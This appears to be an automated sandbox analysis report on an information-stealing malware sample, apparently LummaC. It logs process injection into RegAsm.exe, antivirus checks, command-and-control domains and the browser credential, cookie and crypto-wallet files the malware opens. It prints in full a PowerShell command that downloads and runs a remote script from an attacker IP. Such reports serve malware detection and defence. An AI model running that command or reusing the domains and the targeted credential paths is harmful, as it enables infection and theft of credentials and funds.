Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2124987970.000001EE1228B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2122521955.000001EE10635000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX)
Source: chrome.exe, 00000008.00000002.2123857680.000001EE24E68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_7-18482

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_0043B600 LdrInitializeThunk,

7_2_0043B600

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe

Code function: 0_2_00007FF7D77F18C8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7D77F18C8

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe

Code function: 0_2_00007FF7D77FBC8C GetProcessHeap,

0_2_00007FF7D77FBC8C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D77F18C8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7D77F18C8
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D77F12C4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7D77F12C4
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D77F1A6C SetUnhandledExceptionFilter,	0_2_00007FF7D77F1A6C
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D77F6DB4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7D77F6DB4

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: qh4rltex.dll.5.dr, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: qh4rltex.dll.5.dr, Engineers.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: qh4rltex.dll.5.dr, Engineers.cs	Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.0.cs

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: RegAsm.exe	String found in binary or memory: moutheventushz.shop
Source: RegAsm.exe	String found in binary or memory: respectabosiz.shop
Source: RegAsm.exe	String found in binary or memory: bakedstusteeb.shop
Source: RegAsm.exe	String found in binary or memory: conceszustyb.shop
Source: RegAsm.exe	String found in binary or memory: nightybinybz.shop
Source: RegAsm.exe	String found in binary or memory: standartedby.shop
Source: RegAsm.exe	String found in binary or memory: mutterissuen.shop
Source: RegAsm.exe	String found in binary or memory: worddosofrm.shop
Source: RegAsm.exe	String found in binary or memory: knifedxejsu.cyou

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 441000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 454000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 632008	Jump to behavior

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} \| iex"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} \| iex"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES267D.tmp" "c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"	Jump to behavior

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe

Code function: 0_2_00007FF7D7800910 cpuid

0_2_00007FF7D7800910

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe

Code function: 0_2_00007FF7D77F17A0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF7D77F17A0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1064030638.000000000310F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegAsm.exe, 00000007.00000002.1062635600.0000000000B99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: RegAsm.exe, 00000007.00000002.1062635600.0000000000B99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: GCMKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
